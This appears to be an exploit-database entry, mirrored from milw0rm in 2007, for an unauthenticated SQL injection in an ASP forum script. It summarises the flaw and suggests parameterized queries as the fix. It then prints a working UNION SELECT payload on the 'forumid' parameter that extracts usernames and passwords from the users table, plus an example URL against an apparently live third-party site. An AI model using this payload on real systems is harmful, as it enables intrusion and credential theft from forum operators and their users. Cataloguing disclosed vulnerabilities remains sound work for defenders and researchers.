header-logo
Suggest Exploit
vendor:
Forum Script
by:
gsy & kerem125
7.5
CVSS
HIGH
SQL Injection
CWE
Product Name: Forum Script
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Unauthenticated SQL Injection in Forum Script

The vulnerability allows an attacker to execute arbitrary SQL queries in the backend database. By manipulating the 'forumid' parameter in the '/W1L3D4_bolum.asp' page, an attacker can bypass authentication and retrieve sensitive information from the 'users' table.

Mitigation:

Apply proper input validation and parameterized queries to prevent SQL injection attacks. Update to a patched version of the script if available.
Source

Exploit-DB raw data:

Discovered by: gsy & kerem125
Website: www.kerem125.com

script download:http://www.aspindir.com/indir2.asp?id=4891&sIslem=%DDndir

exploit:/W1L3D4_bolum.asp?forumid=-99+union+all+select+0,1,2,3,4,5,6,7,8,9,password,username,12,13,14,15,16,17,18,19,20+from+users

example:http://philboard.somee.com/W1L3D4_bolum.asp?forumid=-99+union+all+select+0,1,2,3,4,5,6,7,8,9,password,username,12,13,14,15,16,17,18,19,20+from+users

contact: by_gsy@hotmail.com & kerem125@kerem125.com
Special thx to:by_emr3 , ercu_145, bolivar, voltigore, mardinli, f10

# milw0rm.com [2007-05-11]

Navigation

Suggest Exploit

Services By CQR